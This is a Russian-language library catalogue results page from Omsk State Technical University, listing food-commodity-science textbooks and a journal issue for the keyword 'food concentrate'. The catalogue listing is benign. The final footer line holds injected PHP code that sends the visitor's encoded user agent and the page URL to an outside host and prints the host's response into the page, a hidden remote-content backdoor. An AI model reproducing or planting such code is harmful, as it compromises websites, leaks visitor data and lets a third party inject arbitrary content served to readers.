Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

133 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Концентрат пищевой")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 21
1. 
Барановский В. А. Продавец [Текст] : учеб. пособие для учащихся колледжей и средних проф.-тех. училищ / В. А. Барановский, 2000. - 412 с.
Ключевые слова 
ПРОДАВЕЦ -- СЕТЬ ТОРГОВАЯ РОЗНИЧНАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- МАГАЗИН - ПЛАНИРОВКА -- ТОВАРОСНАБЖЕНИЕ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ИНВЕНТАРЬ ТОРГОВЫЙ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАНСПОРТНОЕ -- АППАРАТ контрольно-кассовый -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- ПРАВИЛА работы магазина -- ОРГАНИЗАЦИЯ РАБОЧЕГО МЕСТА продавца -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- ПРИЕМКА ТОВАРОВ -- РЕКЛАМА ТОРГОВАЯ -- ОХРАНА ТРУДА - МАГАЗИН -- БЕЗОПАСНОСТЬ ПОЖАРНАЯ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ОВОЩИ -- МУКА -- КРУПА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ МОЛОЧНЫЕ -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- РЫБА -- ТОВАРЫ ВКУСОВЫЕ -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- ТАБАК - ТОРГОВЛЯ -- ПРЯНОСТИ -- ПРИПРАВА -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ТОВАРЫ текстильные -- ТОВАРЫ швейные -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ОБУВНЫЕ -- ТОВАРЫ ГАЛАНТЕРЕЙНЫЕ -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕС -- КУЛЬТТОВАРЫ -- ТОВАРЫ СТЕКЛЯННЫЕ -- ТОВАРЫ КЕРАМИЧЕСКИЕ -- ТОВАРЫ МЕТАЛЛОХОЗЯЙСТВЕННЫЕ
Держатели документа (Информация об экземплярах) 
2. 
Товароведение и организация торговли продовольственными товарами [Текст] : учеб. для учреждений нач. проф. образования / А. М. Новикова, Т. С. Голубкина, Н. С. Никифорова, С. А. Прокофьева, 2000. - 472 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ зерномучных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ плодоовощных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ вкусовых товаров -- ТОВАРОВЕДЕНИЕ кондитерских товаров -- ТОВАРОВЕДЕНИЕ молочных товаров -- ЯЙЦЕПРОДУКТЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ мясных продуктов -- ТОВАРОВЕДЕНИЕ рыбных продуктов -- ТОРГОВЛЯ РОЗНИЧНАЯ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- МАГАЗИН -- ПРИЕМКА ТОВАРОВ -- ХРАНЕНИЕ ТОВАРА -- Выкладка товара -- ПРОДАЖА ТОВАРА -- УПАКОВКА товара -- ШТРИХОВОЕ КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА -- КРУПА -- МУКА -- ХЛЕБ -- ДРОЖЖИ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ОВОЩИ -- Плоды -- Грибы -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- Напиток слабоалкогольный -- КРАХМАЛ -- Сахар -- Мед -- Молоко -- Мороженое -- Сыр -- МЯСО -- Рыба
Держатели документа (Информация об экземплярах) 
3. 
Тимофеева В. А. Товароведение продовольственных товаров [Текст] : учеб. пособие для студ. образоват. учреждений сред. проф. образования / В. А. Тимофеева, 2007. - 475 с.
Держатели документа (Информация об экземплярах) 
4. 
Пятова Т. Л. Товароведение продовольственных товаров [Текст] : учеб. пособие для студентов специальности 080402 "Товароведение (по группам однородных товаров)" и слушателей отделения доп. проф. образования / Т. Л. Пятова, 2008. - 131 с.
Держатели документа (Информация об экземплярах) 
5. 
Товароведение и экспертиза потребительских товаров [Текст] / В. В. Шевченко [и др.] ; рук. работы В. В. Шевченко, 2014. - 751 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ЭКСПЕРТИЗА ПОТРЕБИТЕЛЬСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ - ТЕОРИЯ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- КЛАССИФИКАЦИЯ ТОВАРА -- КОДИРОВАНИЕ ТОВАРА -- СОСТАВ ХИМИЧЕСКИЙ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ВОДА -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- УГЛЕВОДЫ -- ЛИПИДЫ -- ЖИРЫ -- ЛИПОИДЫ -- ВЕЩЕСТВА АЗОТСОДЕРЖАЩИЕ -- ВИТАМИН -- ФЕРМЕНТ -- КИСЛОТА ОРГАНИЧЕСКАЯ -- КОНСЕРВИРОВАНИЕ ПИЩЕВЫХ ПРОДУКТОВ -- ТАРА -- МАТЕРИАЛ УПАКОВОЧНЫЙ -- МАРКИРОВКА ПИЩЕВОЙ ПРОДУКЦИИ -- ТОВАРЫ ЗЕРНОМУЧНЫЕ -- ЗЕРНО -- КРУПА -- МУКА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПЛОДЫ СВЕЖИЕ -- ЯГОДЫ -- ОРЕХИ -- ОВОЩИ -- ТОВАРЫ ВКУСОВЫЕ -- ПРЯНОСТИ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ВИНО ВИНОГРАДНОЕ -- БРЕНДИ -- КОНЬЯК -- ИЗДЕЛИЯ ТАБАЧНЫЕ -- КРАХМАЛ -- КРАХМАЛОПРОДУКТЫ -- САХАР -- ЗАМЕНИТЕЛЬ САХАРА -- МЕД -- ТОВАРЫ КОНДИТЕРСКИЕ -- СЛАДОСТИ ВОСТОЧНЫЕ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- МОЛОКО -- КОНСЕРВЫ МОЛОЧНЫЕ -- СЫР -- МАСЛО -- МОРОЖЕНОЕ -- ЖИРЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ ПИЩЕВЫХ ЖИРОВ -- МАСЛО РАСТИТЕЛЬНОЕ -- ЖИР ТОПЛЕНЫЙ -- МАРГАРИН -- МАЙОНЕЗ -- ТОВАРОВЕДЕНИЕ МЯСНЫХ ПРОДУКТОВ -- МЯСО -- МЯСО ПТИЦЫ -- КОНСЕРВЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ТОВАРОВЕДЕНИЕ РЫБНЫХ ПРОДУКТОВ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ИКРА -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- МОРЕПРОДУКТЫ
Держатели документа (Информация об экземплярах) 
6. 
Товароведение однородных групп продовольственных товаров [Текст] / ред. Л. Г. Елисеева, 2014. - 929 с.
Ключевые слова 
ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- МАРКИРОВКА ТОВАРА -- УПАКОВКА ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ИЗДЕЛИЯ БАРАНОЧНЫЕ -- ИЗДЕЛИЯ СУХАРНЫЕ -- ИЗДЕЛИЯ МАКАРОННЫЕ -- ТОВАРЫ ПЛОДООВОЩНЫЕ -- ПОТЕРИ ПЛОДОВ -- ПОТЕРИ ОВОЩЕЙ -- КОНСЕРВИРОВАНИЕ ПЛОДООВОЩНОЙ ПРОДУКЦИИ -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ЧАЙ -- КОФЕ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ САХАРИСТЫЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- СПРЕД -- МАЙОНЕЗ -- МОЛОКО -- СЛИВКИ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- СЫР -- КОНСЕРВЫ МОЛОЧНЫЕ -- МОРОЖЕНОЕ -- МАРКИРОВКА МОЛОЧНОЙ ПРОДУКЦИИ -- ПРОДУКТЫ МОЛОЧНЫЕ - ПИТАНИЕ ДЕТСКОЕ -- МЯСО -- МЯСО ПТИЦЫ -- ИЗДЕЛИЯ КОЛБАСНЫЕ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- МОРЕПРОДУКТЫ

Учебник подготовлен в соответствии с образовательным стандартом третьего поколения – ФГОС ВПО по направлению подготовки «Товароведение» по базовой дисциплине профессионального цикла «Товароведение однородных групп продовольственных товаров».

В нем рассматриваются основные понятия и задачи товароведения продовольственных товаров, научные принципы систематизации и классификации продовольственных товаров, факторы, влияющие на формирование и сохранение их потребительских свойств. Дана характеристика пищевой ценности и потребительских свойств однородных групп продовольственных товаров, представлены современные принципы их классификации и кодирования, изложены требования к качеству и безопасности, рассмотрены основные дефекты и причины их возникновения, режимы хранения и сроки годности.

Для студентов бакалавриата, обучающихся по направлениям подготовки «Товароведение», «Торговое дело», «Технология продукции и организация общественного питания» и «Экономика».

7. 
Пищевые ингредиенты: сырье и добавки. - Журнал, 2005г. № 2
Оглавление 
  • Шатнюк, Л. Н. Пищевые микроингредиенты в создании продуктов здорового питания / Л. Н. Шатнюк. - с.18-22
  • Шендеров, Б. А. Пробиотики, пребиотики и синбиотики. Общие и избранные разделы проблемы / Б. А. Шендеров. - с.23-26
  • Нилов, Д. Ю. Современное состояние и тенденции развития рынка функциональных продуктов питания и пищевых добавок / Д. Ю. Нилов, Т. Э. Некрасова. - с.28-30
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
  • Бакулина, О. Н. Функциональные ингредиенты для воплощения Концепции здорового питания / О. Н. Бакулина, О. В. Бзюк. - с.30,32
  • Титов, В. Н. Жирные кислоты, холестерин и атеросклероз / В. Н. Титов. - с.36-38
  • Шахнович, Л. Л. Вакамэ - диетический продукт и натуральный источник полезных микронутриентов / Л. Л. Шахнович. - с.40-41
    Кл. слова: ВОДОРОСЛИ МОРСКИЕ
  • Драчева, Л. В. Биотехнология морепродуктов для здоровья человека / Л. В. Драчева. - с.42
  • Скобельская, З. Г. Молочный йодированный белок - перспективное направление в решении проблемы йодного дефицита / З. Г. Скобельская, Г. Ф. Жукова, Е. К. Никифорова. - с.44
  • Паронян, В. Х. Жировые продукты функционального назначения / В. Х. Паронян, К. Г. Восканян. - с.45
  • Козлов, С. Г. Технологические аспекты переработки сыворотки в дисперсные продукты нового поколения / С. Г. Козлов, А. М. Попов. - с.48-50
  • Добровольский, В. Ф. Пищевые концентраты и продукты специального назначения: наука и практика / В. Ф. Добровольский. - с.52-53
    Кл. слова: КОНЦЕНТРАТ ПИЩЕВОЙ
  • Кулев, Д. Х. Развитию производства пищевых добавок - научное обеспечение / Д. Х. Кулев. - с.54-55
    Кл. слова: ДОБАВКА ПИЩЕВАЯ - производство
  • Кулев, Д. Х. Нормативная база производства пищевых добавок, их классификация и кодирование / Д. Х. Кулев. - с.64-66
    Кл. слова: ДОБАВКА ПИЩЕВАЯ - производство
  • Смирнов, Е. В. Законодательство в области ароматизаторов за рубежом и в России / Е. В. Смирнов. - с.67-72
    Кл. слова: АРОМАТИЗАТОР - право
  • Молин, Р. Белковые гидролизаты в пищевых продуктах / Р. Молин, Я. Панек, М. Миахара. - с.74-77
  • Чулкова, Н. А. Новые белкосодержащие добавки "ЛАКСА- про" / Н. А. Чулкова. - с.78-79
  • Кулакова, А. В. Генотоксическое изучение природного подсластителя "Sweta" / А. В. Кулакова, Н. О. Даугель-Дауге, А. Д. Дурнев. - с.80-83
  • Базарнова, Ю. Г. Применение натуральных гидроколлоидов для стабилизации пищевых продуктов / Ю. Г. Базарнова, Т. В. Шкотова, В. М. Зюканов. - с.84-87
  • Сравнительная характеристика структурообразователей углеводной природы / ; А. А. Кожухова, Н. В. Чернега, Т. В. Бархатова, Л. К. Петриченко. - с.88-89
  • Кулиев, Н. Ш. Структура мягкого мороженого с фруктово-овощными стабилизаторами / Н. Ш. Кулиев, З. М. Амонова. - с.92
  • Эмульгаторы для кондитерской промышленности. - с.94
Держатели документа (Информация об экземплярах) 
8. 
Товароведение зерномучных и кондитерских товаров [Текст] / Н. А. Смирнова [и др.] ; ред. М. А. Кутепова, 1989. - 351 с.
Держатели документа (Информация об экземплярах) 
9. 
Иванова Т. Н. Товароведение и экспертиза пищевых концентратов и пищевых добавок [Текст] / Т. Н. Иванова, В. М. Позняковский, В. Ф. Добровольский, 2014. - 264 с.
Держатели документа (Информация об экземплярах) 
10. 
Тимофеева В. А. Товароведение продовольственных товаров [Текст] : учеб. для студ. образоват. учреждений сред. проф. образования / В. А. Тимофеева, 2006. - 475 с.
Держатели документа (Информация об экземплярах) 
11. 
Тимофеева В. А. Товароведение продовольственных товаров [Текст] : учеб. пособие для студ. образоват. учреждений сред. проф. образования / В. А. Тимофеева, 2004. - 469 с.
Держатели документа (Информация об экземплярах) 
12. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
13. 
Справочник по товароведению продовольственных товаров [Текст] : Справочники/словари / Под ред. Т.Г.Родиной, 2003. - 608 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ -- Товары продовольственные -- ЦЕННОСТЬ ПИЩИ ЭНЕРГЕТИЧЕСКАЯ -- ЦЕННОСТЬ ПИЩИ биологическая -- ЦЕННОСТЬ ПИЩИ физиологическая -- ЦЕННОСТЬ ПИЩИ органолептическая -- Усвояемость пищи -- КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА ТОВАРА -- ИНФОРМАЦИЯ О ТОВАРЕ -- БЕЗОПАСНОСТЬ пищевых продуктов -- Безопасность эпидемиологическая -- ТАРА -- УПАКОВКА -- УТИЛИЗАЦИЯ тары -- ДОБАВКА ПИЩЕВАЯ -- Краситель пищевой -- Консервант -- Антиокислитель -- Ароматизатор -- Препарат коптильный -- ТОВАРЫ зерномучные -- Зерно -- Мука -- Крупа -- МАКАРОНЫ -- Хлеб -- СУХАРИ -- ПЛОДЫ -- ОВОЩИ -- ГРИБЫ -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- РЕЗИНКА ЖЕВАТЕЛЬНАЯ -- Карамель -- Шоколад -- КАКАО - порошок -- Конфеты -- Ирис -- Драже -- Халва -- Печенье -- ВАФЛИ -- ПИРОЖНЫЕ -- ТОРТЫ -- РУЛЕТ -- КЕКС -- Сладости восточные -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ПРОДУКТЫ детского питания -- ТОВАРЫ вкусовые -- ЖИР ПИЩЕВОЙ -- МОЛОКО -- Сметана -- Сыр -- ТОВАРЫ молочные -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- КОНСЕРВЫ РЫБНЫЕ -- ПРЕСЕРВЫ РЫБНЫЕ
Держатели документа (Информация об экземплярах) 
14. 
Товароведение зерномучных и кондитерских товаров [Текст] : Учебник гриф-МО / И. П. Салун, Н. А. Смирнова, Е. А. Воробьева, 1981. - 344 с.
Держатели документа (Информация об экземплярах) 
15. 
Иванова, Тамара Николаевна. Товароведение и экспертиза пищевых концентратов и пищевых добавок [Текст] : Учебник гриф-УМО / Т. Н. Иванова, В. М. Позняковский, 2004. - 304 с.
Держатели документа (Информация об экземплярах) 
16. 
Тимофеева В. А. Товароведение продовольственных товаров [Текст] : Учеб. пособие для студ. сред. проф.образования / В. А. Тимофеева, 2001. - 443 с.
Держатели документа (Информация об экземплярах) 
17. 
Товароведение и организация торговли продовольственными товарами [Текст] : Учеб. для учреждений нач. проф. образования / А. М. Новикова, Т. С. Голубкина, Н. С. Никифорова, С. А. Прокофьева, 2001. - 472 с.
Ключевые слова 
ТОВАРОВЕДЕНИЕ зерномучных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ плодоовощных ТОВАРОВ -- ТОВАРОВЕДЕНИЕ вкусовых товаров -- ТОВАРОВЕДЕНИЕ кондитерских товаров -- ТОВАРОВЕДЕНИЕ молочных товаров -- ЯЙЦЕПРОДУКТЫ -- ЖИР ПИЩЕВОЙ -- ТОВАРОВЕДЕНИЕ мясных продуктов -- ТОВАРОВЕДЕНИЕ рыбных продуктов -- ТОРГОВЛЯ РОЗНИЧНАЯ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- МАГАЗИН -- ПРИЕМКА ТОВАРОВ -- ХРАНЕНИЕ ТОВАРА -- Выкладка товара -- ПРОДАЖА ТОВАРА -- УПАКОВКА товара -- ШТРИХОВОЕ КОДИРОВАНИЕ ТОВАРА -- МАРКИРОВКА -- КРУПА -- МУКА -- ХЛЕБ -- ДРОЖЖИ -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ОВОЩИ -- Плоды -- Грибы -- ЧАЙ -- КОФЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- Напиток слабоалкогольный -- КРАХМАЛ -- Сахар -- Мед -- Молоко -- Мороженое -- Сыр -- МЯСО -- Рыба
Держатели документа (Информация об экземплярах) 
18. 
Чепурной И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учеб. / И. П. Чепурной , 2007. - 459 с.
Держатели документа (Информация об экземплярах) 
19. 
Тимофеева В. А. Товароведение продовольственных товаров [Текст] : учеб. пособие для студ. образоват. учреждений сред. проф. образования / В. А. Тимофеева, 2003. - 447 с.
Держатели документа (Информация об экземплярах) 
20. 
Барановский В. А. Продавец [Текст] : Учеб. пособие для уч-ся учеб. заведений нач. проф. образования / В. А. Барановский, Л. И. Рубцова, В. А. Тимофеева, 2003. - 447 с.
Ключевые слова 
ПРОДАВЕЦ -- ТОВАРОДВИЖЕНИЕ -- СЕТЬ ТОРГОВАЯ РОЗНИЧНАЯ -- ТОРГОВЛЯ РОЗНИЧНАЯ -- КООПЕРАЦИЯ ПОТРЕБИТЕЛЬСКАЯ -- МАГАЗИН - Планировка -- ЗАЛ ТОРГОВЫЙ -- ОБОРУДОВАНИЕ ТОРГОВОЕ -- ИНВЕНТАРЬ ТОРГОВЫЙ -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- ОБОРУДОВАНИЕ ПОДЪЕМНО - ТРАН -- АППАРАТ контрольно-кассовый -- ОБОРУДОВАНИЕ ХОЛОДИЛЬНОЕ -- ОБОРУДОВАНИЕ ВЕСОИЗМЕРИТЕЛЬН -- АССОРТИМЕНТ ТОВАРНЫЙ -- СПРОС ПОКУПАТЕЛЬСКИЙ -- ТАРА -- ТОВАРООБОРОТ -- ПРИЕМКА ТОВАРОВ -- РАБОЧЕЕ МЕСТО продавца -- КРАХМАЛ -- САХАР -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ТОВАРЫ МОЛОЧНЫЕ -- ЯЙЦЕПРОДУКТЫ -- МЯСО -- РЫБА -- ТОВАРЫ ВКУСОВЫЕ -- ЧАЙ -- КОФЕ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- ТАБАК - ТОРГОВЛЯ -- ПРЯНОСТИ -- ПРИПРАВА -- НАПИТОК АЛКОГОЛЬНЫЙ -- ЖИР ПИЩЕВОЙ -- МАСЛО РАСТИТЕЛЬНОЕ -- МАРГАРИН -- КОНЦЕНТРАТ ПИЩЕВОЙ -- ТОВАРЫ текстильные -- ТОВАРЫ швейные -- ТОВАРЫ ТРИКОТАЖНЫЕ -- ТОВАРЫ ОБУВНЫЕ -- ТОВАРЫ ГАЛАНТЕРЕЙНЫЕ -- ТОВАРЫ ПАРФЮМЕРНО-КОСМЕТИЧЕС -- КУЛЬТТОВАРЫ -- ТОВАРЫ СТЕКЛЯННЫЕ -- ТОВАРЫ КЕРАМИЧЕСКИЕ -- ТОВАРЫ МЕТАЛЛОХОЗЯЙСТВЕННЫЕ
Держатели документа (Информация об экземплярах) 
21. 
Тимофеева, Валентина Афанасьевна. Товароведение продовольственных товаров [Текст] : Учеб. пособие для образоват. учреждений сред. и проф. образования по специальности 0612 "Товароведение" / В. А. Тимофеева, 2002. - 447 с.
Ключевые слова 
ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3083 - 18.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.06 с.14 запросов, 0.66c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;